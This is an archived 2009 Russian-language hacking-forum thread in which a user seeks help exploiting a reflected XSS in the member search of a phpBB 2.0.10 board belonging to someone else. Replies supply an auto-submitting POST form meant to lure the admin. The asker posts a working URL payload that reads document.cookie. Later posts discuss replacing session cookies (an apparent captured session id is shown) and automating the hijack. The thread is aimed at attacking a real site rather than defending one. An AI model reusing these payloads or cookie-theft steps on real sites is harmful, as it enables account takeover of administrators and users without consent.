Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

есть ли польза от этого XSS?

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> есть ли польза от этого XSS?
Имя
Сообщение << Старые топики   Новые топики >>
есть ли польза от этого XSS? - 2009-08-22 16:26:42.273333   
Lays_dag

Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
 Привет. Нашел xss на одном из форумов phpbb 2.0.10, в /forum/memberlist.php в форме поиска не фильтруется вводимое, можно почти любой код внедрить в страницу. Но одна беда, как сделать правильную ссылку, чтоб ее можно было скормить админу, если сама ссылка не меняется при поиске?
Заранее спасибо.
Post #: 1
RE: есть ли польза от этого XSS? - 2009-08-22 17:25:21.503333   
][aKER_теоретик

Сообщений: 1192
Оценки: 0
Присоединился: 2009-03-30 09:17:08.123333
 На здоровье
http://forum.xakep.ru/m_1298634/tm.htm
 
Post #: 2
RE: есть ли польза от этого XSS? - 2009-08-23 09:28:49.713333   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
 На эту версию форума есть более опасные баги чем xss
Post #: 3
RE: есть ли польза от этого XSS? - 2009-08-23 09:48:40.100000   
Lays_dag

Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
 FriLL:
quote:

На эту версию форума есть более опасные баги чем xss

Все то, что мне удалось найти в интернете не помогл с этим форумом, сплойты для 2.0.10 не смогли справится с этим форумом, хотя вроде там и написано, что это этот форум и по описаниям тоже похож.(
Post #: 4
RE: есть ли польза от этого XSS? - 2009-08-24 11:05:43.966666   
Lays_dag

Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
 ][aKER_теоретик:
quote:

На здоровье
http://forum.xakep.ru/m_1298634/tm.htm

Спасибо за ссылку. К сожелению ответ на свой вопрос я не нашел(, возможно что-то не понял.
Post #: 5
RE: есть ли польза от этого XSS? - 2009-08-24 15:19:12.003333   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
 ТС объясни нормально что из себя представляет xss
качать phpbb нет желания
Post #: 6
RE: есть ли польза от этого XSS? - 2009-08-25 15:52:30.993333   
Lays_dag

Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
 FriLL я хочу сказать, что сама ссылка после запроса не изменяется, хотя код выполняется, то есть там использован метод POST. Есть ли в этом случае возможность, что нибудь получить, например куки)?
Post #: 7
RE: есть ли польза от этого XSS? - 2009-08-25 15:54:36.053333   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
 есть
надо форму с автосабмитом делать и потом на нее админа заманивать
Post #: 8
RE: есть ли польза от этого XSS? - 2009-08-25 16:03:58.443333   
Lays_dag

Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
 то есть, ты имеешь ввиду написать скрипт, который при нажатии на него сам заполнит нужное поля, на нужной странице, нужным кодом?)
Post #: 9
RE: есть ли польза от этого XSS? - 2009-08-25 22:15:45.010000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
 &lt;form name="xss" method="post" action="http://la-la-ppc.ru/"&gt; &lt;input type="hidden" name="id" value="тут твоё валу - берутся реальные названия полей из сорцов страницы"&gt; &lt;input type="hidden" name="mssg" value="тут тоже валу - берутся реальные названия полей из сорцов страницы"&gt; &lt;/form&gt; &lt;script language="JavaScript" type="text/javascript"&gt; document.xss.submit(); &lt;/script&gt;
Post #: 10
RE: есть ли польза от этого XSS? - 2009-08-26 10:30:23.880000   
Lays_dag

Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
 Спасибо за ответы. Я немного не понял как пользоваться этой формой, вернее я использовал ее как понял, но ничего не вышло. Не понял к примеру по чему два инпута?
Касательн проблемы, все оказалось немного легче, хотя передача данных осуществлялась методом POST, параметры не обрабатывались строго массивом HTTP_POST_VARS, что позволило сделать запрос через строку браузера, указав имя INPUT'а), которое в данном случае было "js_finduser", вот так получилось:
forum/memberlist.php?js_finduser=%3Cimg%20src='ru.gif'%20%20width=100%20hight=100%20onError=alert(document.cookie)%3E
Post #: 11
RE: есть ли польза от этого XSS? - 2009-08-26 15:04:09.036666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
 Два инпута там просто как пример. На самом деле должна быть форма-копия как на той странице, где нашел XSS, до

<sсriрt language="JavaScript" type="text/jаvаsсript">
document.xss.submit();
</sсriрt>

и уж в форму вставляй нужные тебе данные в то поле, где обнаружил XSS

Скопировать форму (html-код формы) можно из сорцов страницы
Post #: 12
RE: есть ли польза от этого XSS? - 2009-08-26 17:46:15.026666   
Lays_dag

Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
 Спасибо Pashkela. В общем куки доходят нормально, поменял я их в опере, но толку ноль, может что то не верно делаю? Вот к примеру phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A6%3A%22105275%22%3B%7D;%20phpbb2mysql_sid=b25854bf82cf37d6a06020a678b4d56a , выделенную часть я поменял на свои, обновил страницу, а толку ноль. Как думаешь в чем может быть дело?
Post #: 13
RE: есть ли польза от этого XSS? - 2009-08-26 17:53:25.256666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
 в том например, что надо все куки менять, а не только phpbb2mysql_data, тем паче только "выделенные части" - вообще все
Post #: 14
RE: есть ли польза от этого XSS? - 2009-08-26 18:08:25.386666   
Lays_dag

Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
 я и сид тоже поменял, просто выкидывает со своего аккаунта и все.
Post #: 15
RE: есть ли польза от этого XSS? - 2009-08-26 19:32:25.610000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
 Есть вероятность, что сессия уже истекла (зависит от того, когда куки спёр) или пароль изменили, или просто выйти и зайти на форум обратно. Как словил куки - действовать надо мгновенно, т.е. автоматически (скриптом)
Post #: 16
RE: есть ли польза от этого XSS? - 2009-08-27 10:44:36.450000   
Lays_dag

Сообщений: 15
Оценки: 0
Присоединился: 2009-08-09 12:36:23.526666
 Какой скрипт юзать посоветуешь? Желательно легкий в обращении)
Post #: 17
RE: есть ли польза от этого XSS? - 2009-08-27 10:47:12.513333   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
 Самописный. Нет таких готовых-универсальных, насколько я знаю
Post #: 18
Страниц:  [1]
Все форумы >> [В Сети] >> есть ли польза от этого XSS?







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.